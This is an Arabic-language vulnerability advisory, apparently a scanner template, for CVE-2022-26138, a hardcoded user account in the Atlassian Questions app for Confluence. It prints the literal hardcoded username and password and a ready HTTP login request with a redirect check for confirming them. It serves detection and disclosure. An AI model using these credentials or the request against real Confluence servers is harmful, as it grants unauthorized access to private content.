
كلمة مرور مضمنة في Atlassian Questions (CVE-2022-26138)

ينشئ تطبيق Atlassian Questions For Confluence الخاص بـ Confluence Server وData Center
حساب مستخدم في Confluence ضمن مجموعة confluence-users
باسم المستخدم disabledsystemuser وكلمة مرور مضمّنة. يمكن لمهاجم
عن بُعد غير مصادق يعرف كلمة المرور المضمّنة
استغلال ذلك لتسجيل الدخول إلى Confluence والوصول إلى جميع المحتويات المتاحة
لمستخدمي مجموعة confluence-users.
يتم إنشاء حساب المستخدم هذا عند تثبيت الإصدارات 2.7.34 و2.7.35 و3.0.2 من التطبيق.
بيانات الاعتماد المضمّنة:
disabledsystemuserdisabled1system1user6708POST /dologin.action HTTP/1.1
Host: victim.local
Content-Type: application/x-www-form-urlencoded
os_username=disabledsystemuser&os_password=disabled1system1user6708&login=Log+in&os_destination=%2Fvulnerable.action
إذا أعاد الخادم التوجيه إلى /vulnerable.action، فإن بيانات الاعتماد صالحة.
كانت بيانات الاعتماد المضمّنة موجودة بوضوح داخل ملفات jar الخاصة بالإضافة المتأثرة
https://packages.atlassian.com/maven-atlassian-external/com/atlassian/confluence/plugins/confluence-questions/3.0.2/confluence-questions-3.0.2.jar